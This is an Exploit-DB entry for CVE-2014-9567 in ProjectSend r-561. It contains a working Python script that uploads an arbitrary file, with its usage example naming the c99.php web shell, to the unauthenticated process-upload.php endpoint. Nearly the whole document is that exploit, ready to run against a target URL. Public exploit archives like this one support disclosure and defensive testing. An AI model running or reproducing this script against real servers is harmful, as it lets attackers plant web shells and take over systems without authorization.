ProjectSend r-561 - Arbitrary File Upload

Author: Fady Mohammed Osman
type: webapps
platform: php
port: 
date_added: 2014-12-16  
date_updated: 2014-12-16  
verified: 0  
codes: OSVDB-116469;CVE-2014-9567  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comProjectSend-r561.zip  

raw file: 35424.py  

#!/usr/bin/python

# Exploit Title: ProjectSend r-651 File Upload
# Date: December 01, 2014
# Exploit Author: Fady Mohamed Osman (Exploit-db id:2986)
# Vendor Homepage: http://www.projectsend.org/
# Software Link: http://www.projectsend.org/download/67/
# Version: r-561
# Tested on: Kubuntu 14.10 x64


import sys
import requests
scriptName = sys.argv[0]
if (len(sys.argv) != 3):
  print "Please enter the target path and the file to upload."
  print "Example : " + scriptName + " http://10.0.0.2/ProjectSend-r561 c99.php"
  quit()
print "Exploiting ProjectSend-r561 File Upload .."
url = sys.argv[1] + "/" + 'process-upload.php' + '?name=' + sys.argv[2]
print "Sending Url " + url
files = {'file': open(sys.argv[2], 'rb')}
r = requests.post(url, files=files)
print r.text